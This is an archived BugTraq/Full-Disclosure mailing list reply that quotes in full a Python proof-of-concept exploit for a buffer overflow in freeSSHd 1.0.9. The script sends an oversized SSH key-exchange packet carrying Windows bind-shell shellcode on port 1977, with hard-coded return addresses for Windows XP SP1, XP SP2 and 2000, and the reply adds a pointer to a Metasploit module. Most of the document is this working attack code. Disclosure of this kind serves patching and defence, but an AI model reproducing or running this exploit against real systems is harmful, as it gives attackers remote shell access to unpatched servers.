BugTraq
POC exploit for freeSSHd version 1.0.9 May 14 2006 09:48PM
Tauqeer Ahmad (ahmadtauqeer yahoo com) (1 replies)
Re: [Full-disclosure] POC exploit for freeSSHd version 1.0.9 May 15 2006 08:44PM
David Maciejak (david maciejak gmail com)
Also available in Metasploit framework:

http://metasploit.com/projects/Framework/modules/exploits/freesshd_key_e
xchange.pm

david maciejak

> Hi all,
>
> Attachment is the POC exploit for freeSSHd version
> 1.0.9
>
> Advisories:
> http://www.securityfocus.com/bid/17958
> http://www.frsirt.com/english/advisories/2006/1786
>
> This was coded for the educational purpose.
>
> Regards,
>
> Tauqeer Ahmad
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
>
> #!/usr/bin/env python
>
> """
> Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
> ahmadtauqeer[at]yahoo.com
> Disclaimer: This Proof of concept exploit is for educational purpose only.
> Please do not use it against any system without prior permission.
> You are responsible for yourself for what you do with this code.
>
> Greetings: All the Pakistani White Hats including me ;)
> Flames: To all the skript kiddies out there. Man grow up!.
> Code tasted against freeSSHd version 1.0.9
> If you didn't get shell at first try, try few times and you will get lucky
>
> Advisories:
> http://www.securityfocus.com/bid/17958
> http://www.frsirt.com/english/advisories/2006/1786
>
> """
> import socket
> import getopt
> import sys
>
> host = "192.168.0.2"
> port = 0
> eip =""
>
> #/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
> shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" > "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" > "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" > "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" > "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" > "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" > "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" > "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" > "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" > "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" > "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" > "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" > "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" > "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" > "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" > "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" > "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" > "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" > "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" > "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0"
>
>
> def exploit():
>
> buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" > "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
>
> buff = buff + "A" * 1055
> buff = buff + eip
> buff = buff + "yyyy"
> buff = buff + "\x90" * 4
> buff = buff + shellcode
> buff = buff + "B" * 19021 + "\r\n"
>
> sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> sock.connect((host, port))
> print "+ Recive reply from server: " + sock.recv(1000)
>
> sock.send(buff)
> print "+ SSHD exploited. Now telnet to port 1977 to get shell "
> print "+ if you didnt get shell in first try.Try again until you success"
>
> sock.close()
> sock = None
>
>
> def usage():
> print "#############################################"
> print "# CODED BY TAUQEER AHMAD #"
> print "# Scientist #"
> print "#############################################"
> print "\n"
> print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
> print "Following OS supported\n"
> print "1 Window XP SP1"
> print "2 Window XP SP2"
> print "3 Windows 2000 Advanced Server"
>
>
> if __name__ == '__main__':
>
> if len(sys.argv) < 7:
> usage()
> sys.exit()
>
> try:
> options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
> except getopt.GetoptError, err:
> print err
> usage()
> sys.exit()
>
>
> for option, value in options:
> if option == '-h':
> host = value
> if option == '-p':
> port = int(value)
> if option == '-o':
> if value == '1':
> eip = "\xFC\x18\xD7\x77" # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
> elif value == '2':
> eip = "\x0A\xAF\xD8\x77" # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
> elif value == '3':
> eip = "\x4D\x3F\xE3\x77" # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
> else:
> usage()
> sys.exit()
>
> exploit()
>
>
>
>
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus